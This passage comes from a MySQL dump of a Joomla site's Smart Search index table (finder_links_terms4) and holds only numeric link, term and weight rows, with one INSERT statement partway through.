(259, 36944, 1.14331),
(260, 36944, 1.14331),
(261, 36944, 1.14331),
(263, 36944, 1.14331),
(264, 36944, 1.14331),
(268, 36944, 1.14331),
(269, 36944, 1.14331),
(270, 36944, 1.14331),
(272, 36944, 1.14331),
(273, 36944, 1.14331),
(288, 36944, 1.14331),
(292, 36944, 1.14331),
(301, 36944, 1.14331),
(304, 36944, 1.14331),
(305, 36944, 1.14331),
(240, 36945, 0.18669),
(242, 36945, 0.18669),
(253, 36945, 0.18669),
(253, 37173, 0.86331),
(268, 37173, 0.86331),
(288, 37173, 0.86331),
(235, 50813, 0.95669),
(236, 50813, 0.95669),
(243, 50815, 0.37331),
(235, 50815, 0.90661),
(235, 50818, 0.42),
(236, 50818, 0.42),
(264, 50818, 0.42),
(275, 50818, 0.42),
(292, 50818, 0.42),
(306, 50818, 0.42),
(288, 50818, 0.84),
(262, 50818, 1.26),
(238, 50818, 4.26),
(246, 50818, 4.26),
(240, 50818, 4.38),
(243, 50818, 4.68),
(239, 50818, 5.52),
(242, 50818, 10.14),
(235, 50819, 1.00331),
(239, 50819, 1.00331),
(242, 50819, 1.00331),
(262, 50819, 2.00662),
(235, 50826, 0.91),
(243, 50826, 0.91),
(235, 50830, 0.32669),
(238, 50830, 0.32669),
(235, 50836, 0.88669),
(238, 50836, 0.88669),
(236, 50853, 0.91),
(235, 50853, 1.82),
(235, 50871, 0.81669),
(264, 50871, 0.81669),
(235, 51314, 0.28),
(242, 51314, 0.28),
(235, 51315, 0.95669),
(242, 51315, 0.95669),
(235, 51320, 0.28),
(273, 51320, 0.28),
(305, 51320, 0.28),
(306, 51320, 0.28),
(235, 51597, 0.91),
(239, 51597, 0.91),
(262, 51597, 0.91),
(304, 51597, 0.91),
(306, 51597, 0.91),
(242, 64308, 0.04669),
(244, 64308, 0.04669),
(193, 64308, 0.09338),
(168, 64320, 0.88669),
(193, 64320, 0.88669),
(243, 64320, 0.88669),
(267, 64320, 0.88669),
(268, 64320, 0.88669),
(306, 64320, 0.88669),
(193, 64324, 1.00331),
(259, 64324, 1.00331),
(260, 64324, 1.00331),
(262, 64324, 1.00331),
(193, 64325, 1.07331),
(259, 64325, 1.07331),
(260, 64325, 1.07331),
(262, 64325, 1.07331),
(193, 64326, 0.37331),
(259, 64326, 0.37331),
(260, 64326, 0.37331),
(261, 64326, 0.37331),
(290, 64326, 0.37331),
(193, 64329, 0.32669),
(239, 64329, 0.32669),
(242, 64329, 0.32669),
(262, 64329, 0.32669),
(306, 64329, 0.32669),
(193, 64330, 0.23331),
(245, 64330, 0.23331),
(193, 64336, 0.32669),
(243, 64336, 0.32669),
(193, 64362, 0.37331),
(240, 64362, 0.37331),
(267, 64362, 0.74662),
(178, 64373, 0.37331),
(244, 64373, 0.37331),
(193, 64373, 0.74662),
(237, 64373, 2.23986),
(193, 65243, 0.28),
(261, 65243, 0.28),
(268, 65243, 0.28),
(242, 65243, 0.56),
(193, 65246, 0.23331),
(239, 65246, 0.23331),
(264, 65246, 0.23331),
(267, 65246, 0.46662),
(304, 65246, 0.69993),
(193, 65247, 0.88669),
(239, 65247, 0.88669),
(264, 65247, 0.88669),
(304, 65247, 0.88669),
(193, 65249, 0.32669),
(242, 65249, 0.32669),
(239, 65265, 0.18669),
(268, 65265, 0.18669),
(193, 65265, 0.56007),
(193, 65740, 0.84),
(241, 65740, 0.84),
(193, 65750, 1.09669),
(259, 65750, 1.09669),
(260, 65750, 1.09669),
(262, 65750, 1.09669),
(193, 65753, 0.93331),
(259, 65753, 0.93331),
(260, 65753, 0.93331),
(268, 65753, 0.93331),
(306, 65753, 1.86662),
(193, 65754, 0.93331),
(240, 65754, 0.93331),
(242, 65766, 0.91),
(243, 65766, 0.91),
(259, 65766, 0.91),
(260, 65766, 0.91),
(273, 65766, 0.91),
(193, 65766, 1.82),
(193, 65769, 0.88669),
(243, 65769, 0.88669),
(275, 65769, 0.88669),
(290, 65769, 0.88669),
(241, 65769, 2.66007),
(193, 65773, 0.95669),
(237, 65773, 0.95669),
(193, 65778, 0.98),
(238, 65778, 0.98),
(241, 65778, 0.98),
(288, 65778, 0.98),
(168, 65815, 0.95669),
(193, 65815, 0.95669),
(240, 65815, 1.91338),
(193, 65816, 1.07331),
(240, 65816, 1.07331),
(193, 65824, 1.14331),
(242, 65824, 1.14331),
(262, 65824, 2.28662),
(193, 65829, 1.00331),
(306, 65829, 1.00331),
(259, 65829, 5.01655),
(260, 65829, 6.01986),
(193, 65830, 1.07331),
(259, 65830, 3.21993),
(260, 65830, 3.21993),
(193, 65833, 1.00331),
(242, 65833, 1.00331),
(246, 65833, 1.00331),
(193, 65835, 0.95669),
(242, 65835, 0.95669),
(193, 65837, 0.95669),
(240, 65837, 0.95669),
(247, 65837, 0.95669),
(237, 68255, 0.28),
(254, 68255, 0.28),
(262, 68255, 0.28),
(237, 69214, 0.84),
(254, 69214, 0.84),
(258, 69214, 0.84),
(237, 69215, 0.95669),
(254, 69215, 0.95669),
(237, 74322, 0.23331),
(238, 74322, 0.23331),
(238, 74357, 0.23331),
(267, 74357, 0.23331),
(178, 74357, 0.69993),
(237, 74357, 0.69993),
(168, 74830, 1.00331),
(238, 74830, 1.00331),
(240, 74830, 1.00331),
(237, 74830, 2.00662),
(242, 74830, 2.00662),
(242, 75392, 0.18669),
(243, 75392, 0.18669),
(254, 75392, 0.18669),
(255, 75392, 0.18669),
(258, 75392, 0.18669),
(268, 75392, 0.18669),
(292, 75392, 0.18669),
(295, 75392, 0.18669),
(305, 75392, 0.18669),
(269, 75392, 0.93345),
(270, 75392, 1.30683),
(301, 75392, 1.30683),
(254, 75393, 0.88669),
(270, 75393, 0.88669),
(301, 75393, 0.88669),
(254, 75397, 0.88669),
(262, 75397, 0.88669),
(178, 75406, 0.23331),
(238, 75406, 0.23331),
(239, 75406, 0.23331),
(261, 75406, 0.23331),
(292, 75406, 0.23331),
(306, 75406, 0.23331),
(254, 75406, 0.46662),
(242, 75406, 0.69993),
(254, 75407, 0.88669),
(261, 75407, 0.88669),
(178, 75409, 0.91),
(238, 75409, 0.91),
(254, 75409, 0.91),
(292, 75409, 0.91),
(254, 75419, 0.18669),
(267, 75419, 0.18669),
(239, 75419, 0.37338),
(254, 75422, 0.86331),
(264, 75422, 0.86331),
(254, 75432, 0.42),
(258, 75432, 0.42),
(274, 75432, 0.42),
(306, 75432, 0.42),
(242, 75442, 0.42),
(254, 75442, 0.42),
(265, 75442, 0.84),
(266, 75442, 0.84),
(254, 75967, 0.14),
(269, 75967, 0.14),
(242, 75975, 0.91),
(272, 75975, 0.91),
(280, 75975, 0.91),
(288, 75975, 0.91),
(254, 75975, 1.82),
(261, 75975, 2.73),
(174, 75999, 0.18669),
(254, 75999, 0.18669),
(274, 75999, 0.18669),
(273, 75999, 0.37338),
(240, 76339, 0.86331),
(254, 76339, 0.86331),
(242, 76346, 1.02669),
(292, 76346, 1.02669),
(254, 76346, 2.05338),
(254, 76347, 1.00331),
(239, 76347, 2.00662),
(254, 76351, 1.02669),
(265, 76351, 1.02669),
(266, 76351, 1.02669),
(254, 76353, 0.91),
(270, 76353, 0.91),
(301, 76353, 0.91),
(243, 76356, 0.88669),
(254, 76356, 0.88669),
(269, 76356, 0.88669),
(304, 76356, 0.88669),
(238, 76358, 1.00331),
(241, 76358, 1.00331),
(254, 76358, 2.00662),
(240, 76362, 0.28),
(254, 76362, 0.28),
(263, 76362, 0.28),
(239, 76367, 0.93331),
(254, 76367, 0.93331),
(256, 76367, 0.93331),
(240, 76367, 1.86662),
(306, 76367, 3.73324),
(241, 76367, 5.59986),
(254, 76371, 1.02669),
(265, 76371, 1.02669),
(266, 76371, 1.02669),
(240, 76372, 1.00331),
(254, 76372, 1.00331),
(238, 76378, 0.91),
(240, 76378, 0.91),
(241, 76378, 0.91),
(254, 76378, 0.91),
(263, 76378, 0.91),
(267, 76378, 1.82),
(236, 77395, 0.77),
(243, 77395, 0.77),
(236, 77524, 0.37331),
(263, 77524, 0.37331),
(236, 77527, 0.86331),
(238, 77527, 0.86331),
(242, 77527, 0.86331),
(273, 77527, 0.86331),
(290, 77527, 0.86331),
(178, 77527, 1.72662),
(292, 77527, 3.45324),
(236, 77534, 0.28),
(273, 77534, 0.28),
(236, 77544, 0.95669),
(241, 77544, 0.95669),
(174, 77544, 3.82676),
(236, 77550, 0.91),
(244, 77550, 0.91),
(287, 77550, 0.91),
(178, 77554, 0.98),
(236, 77554, 0.98),
(244, 77554, 0.98),
(236, 77573, 0.46669),
(249, 77573, 0.46669),
(269, 77573, 0.46669),
(236, 77583, 0.93331),
(243, 77583, 0.93331),
(243, 78045, 0.32669),
(236, 78045, 4.62033),
(243, 78052, 0.93331),
(236, 78052, 1.86662),
(236, 78054, 1.02669),
(243, 78054, 1.02669),
(236, 78057, 0.46669),
(267, 78057, 0.46669),
(236, 78060, 0.28),
(243, 78060, 0.56),
(236, 78061, 0.91),
(243, 78061, 1.82),
(236, 78062, 1.00331),
(243, 78062, 1.00331),
(236, 78067, 0.42),
(239, 78067, 0.42),
(236, 78075, 0.81669),
(243, 78075, 3.26676),
(236, 78085, 0.28),
(243, 78085, 0.28),
(168, 82357, 0.28),
(238, 82357, 0.28),
(275, 82357, 0.28),
(255, 82357, 0.56),
(264, 82357, 0.84),
(168, 82746, 0.95669),
(238, 82746, 0.95669),
(255, 82746, 0.95669),
(259, 82746, 0.95669),
(260, 82746, 0.95669),
(263, 82746, 0.95669),
(292, 82746, 0.95669),
(305, 82746, 0.95669),
(306, 82746, 0.95669),
(178, 84593, 0.28),
(237, 84593, 0.56),
(290, 84593, 0.56),
(237, 84844, 0.37331),
(247, 84844, 0.37331),
(168, 85020, 1.05),
(237, 85020, 1.05),
(239, 85021, 1.00331),
(259, 85021, 1.00331),
(260, 85021, 1.00331),
(304, 85021, 1.00331),
(306, 85021, 1.00331),
(237, 85021, 2.00662),
(237, 85022, 0.91),
(262, 85022, 0.91),
(274, 85022, 0.91),
(237, 85024, 0.84),
(240, 85024, 0.84),
(243, 85024, 0.84),
(304, 85024, 0.84),
(237, 85027, 1.00331),
(240, 85027, 1.00331),
(261, 85027, 1.00331),
(237, 85028, 1.14331),
(263, 85028, 1.14331),
(275, 85028, 1.14331),
(237, 85031, 0.86331),
(247, 85031, 0.86331),
(174, 85044, 0.98),
(237, 85044, 0.98),
(242, 85044, 0.98),
(237, 85045, 1.02669),
(242, 85045, 1.02669),
(270, 85045, 1.02669),
(301, 85045, 1.02669),
(304, 85045, 1.02669),
(174, 85049, 0.91),
(237, 85049, 0.91),
(239, 90643, 0.28),
(261, 90643, 0.28),
(273, 90643, 0.28),
(255, 90643, 0.56),
(272, 90643, 0.56),
(280, 90643, 0.56),
(295, 90643, 0.56),
(287, 90643, 0.96),
(259, 90643, 1.12),
(260, 90643, 1.12),
(239, 91156, 0.88669),
(240, 91156, 0.88669),
(242, 91156, 0.88669),
(255, 91156, 0.88669),
(268, 91156, 0.88669),
(306, 91156, 0.88669),
(174, 91904, 0.88669),
(238, 91904, 0.88669),
(238, 91908, 0.37331),
(259, 91908, 0.37331),
(260, 91908, 0.37331),
(270, 91908, 0.37331),
(290, 91908, 0.37331),
(301, 91908, 0.37331),
(240, 91908, 0.74662),
(306, 91908, 0.74662),
(174, 91911, 0.18669),
(238, 91911, 0.18669),
(262, 91911, 0.18669),
(306, 91911, 0.56007),
(239, 91927, 2.38),
(240, 91927, 2.38),
(242, 91927, 2.38),
(238, 91927, 7.98),
(238, 91929, 1.07331),
(240, 91929, 1.07331),
(242, 91929, 1.07331),
(238, 91935, 1.09669),
(240, 91935, 1.09669),
(238, 91944, 0.91),
(269, 91944, 0.91),
(238, 92571, 0.37331),
(243, 92571, 0.37331),
(264, 92571, 0.37331),
(269, 92571, 0.37331),
(168, 92597, 0.32669),
(238, 92597, 0.32669),
(275, 92597, 0.32669),
(238, 92949, 0.23331),
(267, 92949, 0.46662),
(304, 92949, 0.46662),
(168, 92955, 0.84),
(244, 92955, 0.84),
(272, 92955, 0.84),
(280, 92955, 0.84),
(306, 92955, 1.68),
(263, 92964, 0.95669),
(306, 92964, 0.95669),
(238, 92964, 1.91338),
(240, 92964, 1.91338),
(239, 92964, 3.82676),
(238, 92965, 0.86331),
(259, 92965, 0.86331),
(260, 92965, 0.86331),
(261, 92965, 0.86331),
(268, 92965, 2.58993),
(238, 92971, 0.95669),
(240, 92971, 1.91338),
(238, 92972, 1.21331),
(240, 92972, 1.21331),
(238, 92980, 1.02669),
(267, 92980, 1.02669),
(239, 100068, 1.09669),
(246, 100068, 1.09669),
(174, 100079, 0.28),
(239, 100079, 0.28),
(239, 100092, 0.32669),
(240, 100092, 0.65338),
(239, 100097, 1.09669),
(242, 100097, 1.09669),
(239, 100100, 2.49339),
(240, 100100, 2.49339),
(242, 100100, 2.49339),
(239, 100101, 0.98),
(242, 100101, 0.98),
(264, 100101, 0.98),
(239, 100103, 1.02669),
(240, 100103, 1.02669),
(262, 100103, 1.02669),
(243, 100103, 8.36019),
(239, 100105, 1.02669),
(242, 100105, 1.02669),
(275, 100105, 1.02669),
(246, 100107, 0.56),
(239, 100107, 1.12),
(240, 100107, 1.12),
(242, 100107, 1.12),
(239, 100114, 3.08007),
(240, 100114, 3.08007),
(239, 100116, 1.12),
(240, 100116, 1.12),
(240, 100121, 1.05),
(239, 100121, 2.1),
(243, 100121, 2.1),
(239, 100125, 1.00331),
(240, 100125, 1.00331),
(247, 100125, 1.00331),
(239, 100127, 1.07331),
(242, 100127, 1.07331),
(243, 100132, 1.02669),
(239, 100132, 2.05338),
(239, 100139, 0.91),
(242, 100139, 0.91),
(239, 100143, 0.93331),
(259, 100143, 0.93331),
(260, 100143, 0.93331),
(239, 100144, 1.07331),
(259, 100144, 1.07331),
(260, 100144, 1.07331),
(240, 100150, 0.23331),
(306, 100150, 0.23331),
(239, 100150, 0.46662),
(239, 100151, 1.09669),
(240, 100151, 1.09669),
(239, 100152, 1.28331),
(240, 100152, 1.28331),
(174, 100155, 0.32669),
(239, 100155, 0.32669),
(239, 100163, 0.91),
(257, 100163, 0.91),
(239, 100164, 0.98),
(257, 100164, 0.98),
(242, 100168, 0.56),
(239, 100168, 1.68),
(239, 100175, 0.46669),
(240, 100175, 0.46669),
(292, 100175, 0.46669),
(239, 100185, 1.05),
(242, 100185, 1.05),
(239, 100187, 0.37331),
(242, 100187, 0.37331),
(242, 100195, 0.51331),
(246, 100195, 0.51331),
(239, 100195, 1.02662),
(245, 100200, 0.32669),
(247, 100200, 0.32669),
(248, 100200, 0.32669),
(263, 100200, 0.32669),
(267, 100200, 0.32669),
(239, 100200, 2.66019),
(240, 100200, 2.66019),
(242, 100200, 2.66019),
(240, 100201, 2.66339),
(239, 100201, 8.93019),
(242, 100201, 8.93019),
(239, 100202, 2.83339),
(240, 100202, 2.83339),
(242, 100202, 2.83339),
(239, 100931, 0.18669),
(257, 100931, 0.18669),
(261, 100931, 0.18669),
(273, 100931, 0.18669),
(262, 100931, 0.37338),
(239, 100934, 0.98);
INSERT INTO `y57u5_finder_links_terms4` (`link_id`, `term_id`, `weight`) VALUES
(264, 100934, 0.98),
(239, 100935, 0.28),
(240, 100935, 0.28),
(242, 100935, 0.28),
(259, 100935, 0.28),
(260, 100935, 0.28),
(273, 100935, 0.28),
(287, 100935, 0.28),
(306, 100935, 0.28),
(239, 100941, 0.42),
(269, 100941, 0.42),
(239, 100942, 0.98),
(269, 100942, 0.98),
(239, 100954, 0.7),
(240, 100954, 0.7),
(269, 100954, 0.7),
(168, 100955, 0.18669),
(239, 100955, 0.18669),
(240, 100955, 0.18669),
(272, 100955, 0.18669),
(280, 100955, 0.18669),
(239, 100956, 0.86331),
(240, 100956, 0.86331),
(239, 100957, 0.95669),
(240, 100957, 0.95669),
(239, 100961, 0.91),
(274, 100961, 0.91),
(240, 100966, 0.91),
(242, 100966, 1.82),
(239, 100966, 2.21),
(240, 100967, 1.00331),
(242, 100967, 1.00331),
(239, 100967, 2.43661),
(239, 100969, 0.86331),
(268, 100969, 0.86331),
(239, 101450, 0.84),
(241, 101450, 0.84),
(292, 101450, 0.84),
(306, 101450, 0.84),
(239, 101454, 1.09669),
(240, 101454, 1.09669),
(242, 101454, 1.09669),
(268, 101454, 1.09669),
(239, 101457, 0.88669),
(245, 101457, 0.88669),
(248, 101457, 0.88669),
(256, 101457, 0.88669),
(239, 101459, 1.05),
(259, 101459, 1.05),
(260, 101459, 1.05),
(239, 101461, 0.98),
(270, 101461, 0.98),
(301, 101461, 0.98),
(239, 101464, 1.05),
(263, 101464, 1.05),
(239, 101473, 1.05),
(265, 101473, 7.35),
(266, 101473, 7.35),
(239, 101474, 1.12),
(265, 101474, 5.6),
(266, 101474, 5.6),
(239, 101483, 0.95669),
(240, 101483, 0.95669),
(242, 101914, 1.05),
(255, 101914, 1.05),
(242, 101916, 0.46669),
(255, 101916, 0.46669),
(288, 101916, 0.46669),
(178, 102205, 0.88669),
(255, 102205, 0.88669),
(255, 102397, 0.86331),
(258, 102397, 0.86331),
(255, 102398, 1.05),
(258, 102398, 1.05),
(255, 102403, 0.86331),
(268, 102403, 0.86331),
(304, 102403, 0.86331),
(255, 102406, 0.86331),
(258, 102406, 0.86331),
(306, 102406, 1.72662),
(243, 102413, 0.95669),
(255, 102413, 0.95669),
(247, 102418, 0.93331),
(256, 102418, 0.93331),
(257, 102418, 0.93331),
(265, 102418, 0.93331),
(266, 102418, 0.93331),
(267, 102418, 0.93331),
(255, 102418, 4.66655),
(246, 108078, 0.37331),
(257, 108078, 0.37331),
(287, 108078, 0.37331),
(256, 108078, 0.74662),
(178, 110112, 0.18669),
(257, 110112, 0.18669),
(178, 110113, 0.86331),
(257, 110113, 0.86331),
(257, 110122, 0.42),
(274, 110122, 0.42),
(257, 110123, 0.98),
(274, 110123, 0.98),
(246, 110454, 0.60669),
(257, 110454, 0.60669),
(263, 110454, 0.60669),
(267, 110454, 0.60669),
(306, 110454, 1.82007),
(174, 110454, 2.42676),
(257, 110461, 0.32669),
(263, 110461, 0.32669),
(272, 110461, 0.32669),
(280, 110461, 0.32669),
(242, 110461, 0.65338),
(249, 110461, 0.65338),
(257, 110672, 0.86331),
(261, 110672, 0.86331),
(269, 110672, 0.86331),
(306, 110672, 0.86331),
(292, 110672, 1.72662),
(241, 110677, 0.93331),
(257, 110677, 0.93331),
(269, 110677, 0.93331),
(257, 110679, 0.88669),
(268, 110679, 0.88669),
(288, 110679, 0.88669),
(241, 110681, 0.88669),
(257, 110681, 0.88669),
(288, 110681, 0.88669),
(243, 110684, 0.86331),
(257, 110684, 0.86331),
(273, 110684, 0.86331),
(304, 110684, 0.86331),
(306, 110684, 1.72662),
(174, 110686, 1.00331),
(244, 110686, 1.00331),
(257, 110686, 1.00331),
(306, 110686, 1.00331),
(257, 110694, 0.98),
(263, 110694, 0.98),
(269, 110694, 0.98),
(306, 110694, 0.98),
(270, 110694, 1.96),
(272, 110694, 1.96),
(280, 110694, 1.96),
(301, 110694, 1.96),
(259, 110694, 2.94),
(260, 110694, 2.94),
(257, 110695, 1.07331),
(269, 110695, 1.07331),
(270, 110695, 1.07331),
(301, 110695, 1.07331),
(257, 110703, 1.00331),
(267, 110703, 1.00331),
(247, 110704, 1.02669),
(257, 110704, 1.02669),
(275, 110704, 1.02669),
(306, 110704, 1.02669),
(273, 110704, 4.54677),
(240, 114861, 0.86331),
(241, 114861, 0.86331),
(246, 114861, 0.86331),
(306, 114861, 0.86331),
(267, 114861, 1.72662),
(268, 114861, 1.72662),
(288, 114861, 1.72662),
(243, 115079, 0.37331),
(256, 115079, 0.37331),
(270, 115079, 0.37331),
(275, 115079, 0.37331),
(301, 115079, 0.37331),
(256, 115457, 0.28),
(258, 115457, 0.28),
(305, 115457, 0.56),
(245, 115463, 0.23331),
(256, 115463, 0.23331),
(245, 115464, 0.88669),
(256, 115464, 0.88669),
(256, 115652, 0.98),
(263, 115652, 0.98),
(248, 115653, 1.00331),
(256, 115653, 1.00331),
(174, 115658, 0.91),
(256, 115658, 0.91),
(304, 115658, 0.91),
(256, 115662, 0.98),
(265, 115662, 0.98),
(266, 115662, 0.98),
(256, 115670, 1.05),
(273, 115670, 1.05),
(242, 115671, 1.02669),
(256, 115671, 1.02669),
(268, 115671, 1.02669),
(272, 115672, 1.02669),
(280, 115672, 1.02669),
(256, 115672, 2.05338),
(249, 115679, 1.00331),
(256, 115679, 1.00331),
(264, 115679, 1.00331),
(241, 116110, 0.18669),
(242, 116110, 0.18669),
(275, 116110, 0.18669),
(242, 118204, 0.28),
(306, 118204, 0.28),
(240, 118204, 0.56),
(243, 118204, 0.56),
(240, 118216, 0.42),
(262, 118216, 0.42),
(242, 118216, 0.84),
(240, 118217, 1.05),
(242, 118217, 1.05),
(240, 118218, 1.19),
(242, 118218, 1.19),
(242, 118756, 0.93331),
(240, 118756, 1.86662),
(240, 118819, 0.91),
(242, 118819, 0.91),
(270, 118819, 0.91),
(272, 118819, 0.91),
(280, 118819, 0.91),
(301, 118819, 0.91),
(268, 118819, 1.82),
(241, 146558, 0.84),
(243, 146558, 0.84),
(267, 146558, 0.84),
(241, 146565, 0.98),
(243, 146565, 0.98),
(240, 146984, 0.91),
(269, 146984, 0.91),
(240, 146986, 0.93331),
(270, 146986, 0.93331),
(301, 146986, 0.93331),
(306, 146986, 1.86662),
(246, 146990, 0.84),
(267, 146990, 0.84),
(269, 146990, 0.84),
(178, 146990, 1.68),
(240, 146990, 1.68),
(240, 147081, 0.37331),
(269, 147081, 0.37331),
(174, 147859, 0.23331),
(240, 147859, 0.23331),
(245, 147859, 0.23331),
(263, 147859, 0.23331),
(240, 147860, 0.91),
(263, 147860, 0.91),
(240, 147863, 0.32669),
(267, 147863, 0.32669),
(168, 147875, 0.37331),
(240, 147875, 0.37331),
(259, 147875, 0.37331),
(260, 147875, 0.37331),
(265, 147875, 0.37331),
(266, 147875, 0.37331),
(269, 147875, 0.37331),
(273, 147875, 0.37331),
(174, 147875, 0.74662),
(174, 147876, 1.00331),
(240, 147876, 1.00331),
(259, 147876, 1.00331),
(260, 147876, 1.00331),
(174, 147877, 1.14331),
(240, 147877, 1.14331),
(240, 147880, 0.65331),
(265, 147880, 0.65331),
(266, 147880, 0.65331),
(268, 147880, 0.65331),
(240, 147881, 1.09669),
(265, 147881, 1.09669),
(266, 147881, 1.09669),
(240, 148413, 0.91),
(246, 148413, 0.91),
(174, 148424, 1.09669),
(240, 148424, 2.19338),
(240, 148429, 0.84),
(268, 148429, 0.84),
(272, 148429, 0.84),
(280, 148429, 0.84),
(305, 148429, 0.84),
(240, 148435, 0.88669),
(247, 148435, 0.88669),
(248, 148439, 0.98),
(240, 148439, 1.96),
(178, 148452, 0.93331),
(240, 148452, 0.93331),
(259, 148452, 0.93331),
(260, 148452, 0.93331),
(263, 148452, 0.93331),
(305, 148452, 0.93331),
(240, 148456, 0.95669),
(269, 148456, 0.95669),
(240, 148466, 1.00331),
(263, 148466, 1.00331),
(269, 148466, 1.00331),
(270, 148466, 1.00331),
(274, 148466, 1.00331),
(301, 148466, 1.00331),
(259, 148466, 2.00662),
(260, 148466, 2.00662),
(272, 148466, 2.00662),
(280, 148466, 2.00662),
(240, 148474, 1.14331),
(265, 148474, 1.14331),
(266, 148474, 1.14331),
(240, 148475, 1.21331),
(265, 148475, 1.21331),
(266, 148475, 1.21331),
(240, 148480, 0.98),
(265, 148480, 0.98),
(266, 148480, 0.98),
(240, 148484, 1.05),
(247, 148484, 1.05),
(242, 149174, 0.37331),
(259, 149174, 0.37331),
(260, 149174, 0.37331),
(242, 149198, 0.56),
(259, 149198, 0.56),
(260, 149198, 0.56),
(288, 149198, 0.56),
(242, 150245, 0.28),
(243, 150245, 0.28),
(244, 150245, 0.28),
(273, 150245, 0.28),
(242, 150246, 0.91),
(243, 150246, 0.91),
(242, 151045, 0.84),
(244, 151045, 0.84),
(259, 151045, 0.84),
(260, 151045, 0.84),
(174, 151070, 0.91),
(242, 151070, 0.91),
(259, 151070, 0.91),
(260, 151070, 0.91),
(243, 157107, 0.88669),
(270, 157107, 0.88669),
(292, 157107, 0.88669),
(301, 157107, 0.88669),
(243, 157111, 0.98),
(268, 157111, 0.98),
(246, 157127, 1.00331),
(243, 157127, 2.00662),
(178, 157149, 0.86331),
(243, 157149, 0.86331),
(243, 157166, 0.91),
(272, 157166, 0.91),
(280, 157166, 0.91),
(243, 157169, 0.23331),
(263, 157169, 0.46662),
(178, 157172, 0.32669),
(243, 157172, 0.32669),
(243, 157718, 0.42),
(272, 157718, 0.42),
(274, 157718, 0.42),
(280, 157718, 0.42),
(305, 157718, 0.42),
(243, 158083, 0.98),
(259, 158083, 0.98),
(260, 158083, 0.98),
(262, 158083, 0.98),
(241, 159077, 0.86331),
(268, 159077, 0.86331),
(241, 159081, 0.88669),
(264, 159081, 1.77338),
(178, 159100, 0.95669),
(241, 159100, 0.95669),
(306, 159100, 1.91338),
(241, 159853, 0.98),
(268, 159853, 0.98),
(241, 159866, 0.95669),
(261, 159866, 1.91338),
(241, 159872, 0.86331),
(273, 159872, 0.86331),
(267, 159872, 1.72662),
(305, 159872, 1.72662),
(262, 163512, 0.42),
(306, 163512, 0.42),
(258, 163512, 0.84),
(258, 163517, 0.32669),
(272, 163517, 0.32669),
(280, 163517, 0.32669),
(244, 167797, 0.95669),
(259, 167797, 0.95669),
(260, 167797, 0.95669),
(242, 168527, 0.98),
(262, 168527, 0.98),
(242, 168528, 1.05),
(262, 168528, 1.05),
(242, 168536, 0.42),
(248, 168536, 0.42),
(174, 168548, 0.28),
(242, 168548, 0.28),
(248, 168548, 0.28),
(267, 168597, 0.28),
(242, 168597, 0.56),
(242, 168598, 0.91),
(267, 168598, 0.91),
(168, 168614, 0.51331),
(242, 168614, 1.02662),
(242, 168646, 1.02669),
(246, 168646, 1.02669),
(265, 169628, 0.32669),
(266, 169628, 0.32669),
(242, 169628, 0.65338),
(174, 169641, 1.19),
(306, 169641, 1.19),
(242, 169641, 2.38),
(242, 169675, 0.95669),
(272, 169675, 0.95669),
(280, 169675, 0.95669),
(242, 169681, 0.18669),
(268, 169681, 0.18669),
(242, 170269, 1.07331),
(262, 170269, 1.07331),
(242, 170272, 0.91),
(261, 170272, 0.91),
(242, 170281, 0.88669),
(244, 170281, 0.88669),
(269, 170281, 0.88669),
(174, 170321, 1.02669),
(242, 170321, 1.02669),
(242, 170340, 0.98),
(270, 170340, 3.92),
(301, 170340, 3.92),
(242, 170353, 0.98),
(274, 170353, 9.94),
(259, 173387, 0.95669),
(260, 173387, 0.95669),
(259, 173388, 1.07331),
(260, 173388, 1.07331),
(259, 173389, 1.00331),
(260, 173389, 1.00331),
(261, 173389, 1.00331),
(259, 173390, 1.12),
(260, 173390, 1.12),
(259, 173391, 2.00662),
(260, 173391, 2.00662),
(259, 173392, 2.24),
(260, 173392, 2.24),
(272, 173393, 0.91),
(280, 173393, 0.91),
(259, 173393, 1.82),
(260, 173393, 1.82),
(259, 173394, 1.00331),
(260, 173394, 1.00331),
(259, 173395, 1.12),
(260, 173395, 1.12),
(259, 173396, 0.42),
(260, 173396, 0.42),
(272, 173396, 0.42),
(280, 173396, 0.42),
(288, 173396, 0.84),
(304, 173396, 1.68),
(259, 173397, 1.00331),
(260, 173397, 1.00331),
(272, 173397, 1.00331),
(280, 173397, 1.00331),
(259, 173398, 1.14331),
(260, 173398, 1.14331),
(259, 173399, 0.91),
(260, 173399, 0.91),
(259, 173400, 1.05),
(260, 173400, 1.05),
(259, 173401, 0.95669),
(260, 173401, 0.95669),
(259, 173402, 1.05),
(260, 173402, 1.05),
(259, 173403, 0.37331),
(260, 173403, 0.37331),
(259, 173404, 0.98),
(260, 173404, 0.98),
(259, 173405, 1.05),
(260, 173405, 1.05),
(247, 173406, 0.42),
(259, 173406, 0.42),
(260, 173406, 0.42),
(259, 173407, 1.09669),
(260, 173407, 1.09669),
(259, 173408, 1.19),
(260, 173408, 1.19),
(259, 173409, 1.07331),
(260, 173409, 1.07331),
(259, 173410, 1.23669),
(260, 173410, 1.23669),
(259, 173411, 0.51331),
(260, 173411, 0.51331),
(259, 173412, 1.02669),
(260, 173412, 1.02669),
(259, 173413, 1.14331),
(260, 173413, 1.14331),
(259, 173704, 0.93331),
(260, 173704, 0.93331),
(259, 173705, 1.05),
(260, 173705, 1.05),
(259, 173706, 0.28),
(260, 173706, 0.28),
(263, 173706, 0.56),
(259, 173707, 0.98),
(260, 173707, 0.98),
(259, 173708, 1.09669),
(260, 173708, 1.09669),
(259, 173709, 0.37331),
(260, 173709, 0.37331),
(259, 173710, 0.98),
(260, 173710, 0.98),
(259, 173711, 1.09669),
(260, 173711, 1.09669),
(259, 173712, 1.21331),
(260, 173712, 1.21331),
(259, 173713, 0.32669),
(260, 173713, 0.32669),
(259, 173714, 0.95669),
(260, 173714, 0.95669),
(259, 173715, 1.02669),
(260, 173715, 1.02669),
(259, 173917, 0.91),
(260, 173917, 0.91),
(259, 173918, 0.98),
(260, 173918, 0.98),
(259, 173919, 0.93331),
(260, 173919, 0.93331),
(259, 173920, 1.00331),
(260, 173920, 1.00331),
(259, 173921, 1.05),
(260, 173921, 1.05),
(259, 173922, 0.98),
(260, 173922, 0.98),
(259, 173923, 1.07331),
(260, 173923, 1.07331),
(259, 173924, 1.05),
(260, 173924, 1.05),
(259, 173925, 1.12),
(260, 173925, 1.12),
(259, 173926, 1.14331),
(260, 173926, 1.14331),
(259, 173927, 1.02669),
(260, 173927, 1.02669),
(259, 173928, 1.02669),
(260, 173928, 1.02669),
(259, 173929, 1.12),
(260, 173929, 1.12),
(259, 173930, 0.88669),
(260, 173930, 0.88669),
(259, 173931, 1.00331),
(260, 173931, 1.00331),
(259, 173932, 0.91),
